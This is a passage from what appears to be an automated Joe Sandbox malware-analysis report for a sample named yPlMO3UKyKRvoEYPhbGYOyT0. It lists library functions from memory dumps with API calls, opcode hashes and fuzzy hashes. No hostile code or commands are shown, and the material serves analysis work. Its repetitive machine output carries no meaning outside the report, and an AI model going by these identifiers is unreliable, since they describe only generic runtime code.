                                                                                                                                                                                                                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 05BBCC51
                                                                                                                                                                                                                                  • SetLastError.KERNEL32(00000000,?,05BBCC13,05BBA4C2), ref: 05BBCCA3
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2255723708.0000000005BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BB0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_5bb0000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3852720340-0
                                                                                                                                                                                                                                  • Opcode ID: 0582111726bc4582c636df92e8fe045c6ff17bb16724062b7f54ac71f9743851
                                                                                                                                                                                                                                  • Instruction ID: f291e6eedfc3d54a71cfa04fc498d2b6041e4010ff95eface944d9f8d665408c
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0582111726bc4582c636df92e8fe045c6ff17bb16724062b7f54ac71f9743851
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EC01D8323097265EB7246675BD8CBBB3F55EB2167472002BDF228950F0EFE66C0141C8
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00416D19 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2249148672.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2249148672.000000000043E000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorLast$_free$_abort
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3160817290-0
                                                                                                                                                                                                                                  • Opcode ID: 998e373a8b585b2683437369c8faaac4270011fdab842cf86591235bf0544559
                                                                                                                                                                                                                                  • Instruction ID: ed1cfbe94671cc1e241a5e305b234748cf7dab698c9013e935629a888f8688e1
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 998e373a8b585b2683437369c8faaac4270011fdab842cf86591235bf0544559
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1CF0A431784B1066C6227B36BC0AFDF26299FC1765B27062FF518A2291EF2CD882815D
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 05BC6F80 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2255723708.0000000005BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BB0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_5bb0000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorLast$_free$_abort
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3160817290-0
                                                                                                                                                                                                                                  • Opcode ID: 998e373a8b585b2683437369c8faaac4270011fdab842cf86591235bf0544559
                                                                                                                                                                                                                                  • Instruction ID: 6e23618bcba0e08c76fa4f8d38c1ceef9eaac585c64bc06ca03a1057ab393eb5
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 998e373a8b585b2683437369c8faaac4270011fdab842cf86591235bf0544559
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 56F08135748A112AC3222B7D6C0DF2F2F56EBC17A1F2541FCF526E2290EE21A802456D
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00417253 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 52libraryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,-@,00000000,00000000,?,004171FA,-@,00000000,00000000,00000000,?,004174B2,00000006,FlsSetValue), ref: 00417285
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,004171FA,-@,00000000,00000000,00000000,?,004174B2,00000006,FlsSetValue,0042E2F0,FlsSetValue,00000000,00000364,?,00416DEB), ref: 00417291
                                                                                                                                                                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,004171FA,-@,00000000,00000000,00000000,?,004174B2,00000006,FlsSetValue,0042E2F0,FlsSetValue,00000000), ref: 0041729F
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2249148672.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2249148672.000000000043E000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                  • String ID: -@
                                                                                                                                                                                                                                  • API String ID: 3177248105-2564449678
                                                                                                                                                                                                                                  • Opcode ID: cfd02a50bf476b7c4f1bcf1e7d068622a64cc9e2d77f2ff3f9ca9aa917f168a2
                                                                                                                                                                                                                                  • Instruction ID: 8997a9a2b537593604dca6541f5acb5d3abab1905c8fb23eed40c845f27096e8
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cfd02a50bf476b7c4f1bcf1e7d068622a64cc9e2d77f2ff3f9ca9aa917f168a2
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: ED01473634A2239BC7314B68AC44A9B3BA8BF117607114675F90AE3240DB34D843C6EC
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0040187F Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 39COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 004018C9
                                                                                                                                                                                                                                  • std::system_error::system_error.LIBCPMT ref: 004018D8
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2249148672.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2249148672.000000000043E000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Exception@8Throwstd::system_error::system_error
                                                                                                                                                                                                                                  • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                                                                                                                  • API String ID: 1589814233-1866435925
                                                                                                                                                                                                                                  • Opcode ID: f2b461feaf179d542cbf2c4e0a6ea1a5b768cccac94e3b71525c17bbe98a983a
                                                                                                                                                                                                                                  • Instruction ID: 07e54f61a89a03d5a6d9a7cf2ef478e5e050e13e4079476904521aa99984b06a
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f2b461feaf179d542cbf2c4e0a6ea1a5b768cccac94e3b71525c17bbe98a983a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 78F0C26290035C63DB10B9659C42FEA7B989F09358F24C03BFD45761E1D77D5A04C6ED
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 05BB1AE6 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 39COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 05BB1B30
                                                                                                                                                                                                                                  • std::system_error::system_error.LIBCPMT ref: 05BB1B3F
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2255723708.0000000005BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BB0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_5bb0000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Exception@8Throwstd::system_error::system_error
                                                                                                                                                                                                                                  • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                                                                                                                  • API String ID: 1589814233-1866435925
                                                                                                                                                                                                                                  • Opcode ID: f2b461feaf179d542cbf2c4e0a6ea1a5b768cccac94e3b71525c17bbe98a983a
                                                                                                                                                                                                                                  • Instruction ID: b903d22202ca20feb85b5dfac58b07c44e686b29abb255243da470b13de47892
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f2b461feaf179d542cbf2c4e0a6ea1a5b768cccac94e3b71525c17bbe98a983a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6CF0FC71A0431C73EB20AA589C54FF97B6C9F08290F1080A5ED4567190E7F4BA04C2E8
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00413A6C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00413A1D,00000003,?,004139BD,00000003,00439450,0000000C,00413B14,00000003,00000002), ref: 00413A8C
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00413A9F
                                                                                                                                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,?,?,00413A1D,00000003,?,004139BD,00000003,00439450,0000000C,00413B14,00000003,00000002,00000000), ref: 00413AC2
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2249148672.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2249148672.000000000043E000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                  • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                  • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                  • Opcode ID: aee02ad5ca534fb28cb66d43b3f01b7085f8b2a17258c2e684143968d834cc31
                                                                                                                                                                                                                                  • Instruction ID: a34188c843a8f46fdd92a2bf3fbb0ddbd7449eedd0cf1b17e067f3e400b11719
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: aee02ad5ca534fb28cb66d43b3f01b7085f8b2a17258c2e684143968d834cc31
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2CF0A930B01218BBDB109F50DC05B9E7F78EF44752F404069F809A2290DF344E45C79C
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0041AA79 Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2249148672.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2249148672.000000000043E000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 9991de58590992e92c6734fa5e686e80b55cc645183ccc2c8a9f166d6c2c0499
                                                                                                                                                                                                                                  • Instruction ID: 9cd28828fb54a95b18f1d3d04b552151bab261da8883c7926ca586bf812e9daa
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9991de58590992e92c6734fa5e686e80b55cc645183ccc2c8a9f166d6c2c0499
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AA71B1359022569BCB218B59C884AFFBB75EF41350F14422BE914A7380E7789CE1C7EA
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 05BCACE0 Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2255723708.0000000005BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BB0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_5bb0000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 9991de58590992e92c6734fa5e686e80b55cc645183ccc2c8a9f166d6c2c0499
                                                                                                                                                                                                                                  • Instruction ID: da8b6409bf716081acfa2913be97b716571dfc89e79d2b552b7eb0fcbfcbeaee
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9991de58590992e92c6734fa5e686e80b55cc645183ccc2c8a9f166d6c2c0499
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9A719071A0561F9BCB21DB54C884AFFBF76FF41310B2441EEE515A7280DB70A941C7A8
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 004145CC Relevance: 7.7, APIs: 5, Instructions: 187COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 00417A45: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0041B4CD,00000000,?,00410DE7,?,00000008,?,00411992,?,?,?), ref: 00417A77
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 004146D7
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 004146EE
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0041470D
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00414728
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0041473F
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2249148672.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2249148672.000000000043E000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _free$AllocateHeap
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3033488037-0
                                                                                                                                                                                                                                  • Opcode ID: 088220e492716788e8e6bec049d5caff652ce20ed0a84fe148ba2189e9e303d7
                                                                                                                                                                                                                                  • Instruction ID: c2206efc5f66e5100cf0e8c7e25606760de7fe79bb98949094d9bf3f90d27d39
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 088220e492716788e8e6bec049d5caff652ce20ed0a84fe148ba2189e9e303d7
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6B51D471A00304AFDB20DF65D881BAA77F4EF99728F15056EE809D7690E739E981CB48
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 05BC4833 Relevance: 7.7, APIs: 5, Instructions: 187COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2255723708.0000000005BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BB0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_5bb0000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _free$AllocateHeap
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3033488037-0
                                                                                                                                                                                                                                  • Opcode ID: 8544e75f2518b62a1a383347014769151c2d842ae9fb572832dcd9a460fabfde
                                                                                                                                                                                                                                  • Instruction ID: 21871a425409f653782abd41f0773fc05d7a11495ab4d632d5cf13ecfec7c9fc
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8544e75f2518b62a1a383347014769151c2d842ae9fb572832dcd9a460fabfde
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D651AF31A00215AFDB20DF69C890A6A7BF5FF45721B1405EEE80ADB250EB71FA018B48
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00415063 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2249148672.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2249148672.000000000043E000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _free
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 269201875-0
                                                                                                                                                                                                                                  • Opcode ID: 1450a82dd80fdefbfcbec48a944690f0dac7dfc0c2c461d496b8d8880cae35ad
                                                                                                                                                                                                                                  • Instruction ID: dd2835c9885c6aa3f8cce8b3b5d5cac91b3775441f4e2c90be38872ca8706c4a
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1450a82dd80fdefbfcbec48a944690f0dac7dfc0c2c461d496b8d8880cae35ad
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A341D332E00710EFDB15DFA9C880A9AB7B1EF89314B1545AAE515EB382D735AD41CB84
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 05BC52CA Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2255723708.0000000005BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BB0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_5bb0000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _free
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 269201875-0
                                                                                                                                                                                                                                  • Opcode ID: 1450a82dd80fdefbfcbec48a944690f0dac7dfc0c2c461d496b8d8880cae35ad
                                                                                                                                                                                                                                  • Instruction ID: 1e458b5bd69bfedc18229d8ebc086232066fc39520b98dff16ab5cac34c23d9b
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1450a82dd80fdefbfcbec48a944690f0dac7dfc0c2c461d496b8d8880cae35ad
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5641CF32A002049BDB24DF68C884A6ABBB6EF85314B1545EDD556EB291EBB1B901CB84
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0041B429 Relevance: 7.6, APIs: 5, Instructions: 110COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00411992,?,00000000,?,00000001,?,?,00000001,00411992,?), ref: 0041B476
                                                                                                                                                                                                                                  • __alloca_probe_16.LIBCMT ref: 0041B4AE
                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0041B4FF
                                                                                                                                                                                                                                  • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00410DE7,?), ref: 0041B511
                                                                                                                                                                                                                                  • __freea.LIBCMT ref: 0041B51A
                                                                                                                                                                                                                                    • Part of subcall function 00417A45: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0041B4CD,00000000,?,00410DE7,?,00000008,?,00411992,?,?,?), ref: 00417A77
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2249148672.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2249148672.000000000043E000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 313313983-0
                                                                                                                                                                                                                                  • Opcode ID: 2ab1cb42388bea207d069ccf979aa5779a8c9a7d5d58f401a09ee4fbb91ad362
                                                                                                                                                                                                                                  • Instruction ID: e6e93543b041c594e81487d5909f541e573430f1ea5015fd54542e6688d1641d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2ab1cb42388bea207d069ccf979aa5779a8c9a7d5d58f401a09ee4fbb91ad362
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E931AC32A0021AABDB249F65DC41DEF7BA5EF40318F04412AFC04D6291EB39CD95CB94
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0041E533 Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetEnvironmentStringsW.KERNEL32 ref: 0041E53C
                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041E55F
                                                                                                                                                                                                                                    • Part of subcall function 00417A45: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0041B4CD,00000000,?,00410DE7,?,00000008,?,00411992,?,?,?), ref: 00417A77
                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0041E585
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0041E598
                                                                                                                                                                                                                                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0041E5A7
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2249148672.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2249148672.000000000043E000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 336800556-0
                                                                                                                                                                                                                                  • Opcode ID: fd9cb40695fd0089d65125f9c917d3271f033025ad03b813fa21ea85d7d026fb
                                                                                                                                                                                                                                  • Instruction ID: da1d7805988d3e4f29d48d7d5147bf5fd0936ba562dc79f78d94e6ba61cfb34a
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fd9cb40695fd0089d65125f9c917d3271f033025ad03b813fa21ea85d7d026fb
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4901D8766027207F23211AB75C48DFF6E6EDEC6B98355012EFD08D6200FE688D429178
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 05BCE79A Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetEnvironmentStringsW.KERNEL32 ref: 05BCE7A3
                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 05BCE7C6
                                                                                                                                                                                                                                    • Part of subcall function 05BC7CAC: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 05BC7CDE
                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 05BCE7EC
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 05BCE7FF
                                                                                                                                                                                                                                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 05BCE80E
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2255723708.0000000005BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BB0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_5bb0000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 336800556-0
                                                                                                                                                                                                                                  • Opcode ID: 38dd7213b9bcb45c1147e39a21c5c15d2d7fc2ddc2b943de6988b854aed99f6c
                                                                                                                                                                                                                                  • Instruction ID: f72cd91c361b48458bbf3aa1de0a8fbad73a37823bcc8955e9f52d8ffaf5edcc
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 38dd7213b9bcb45c1147e39a21c5c15d2d7fc2ddc2b943de6988b854aed99f6c
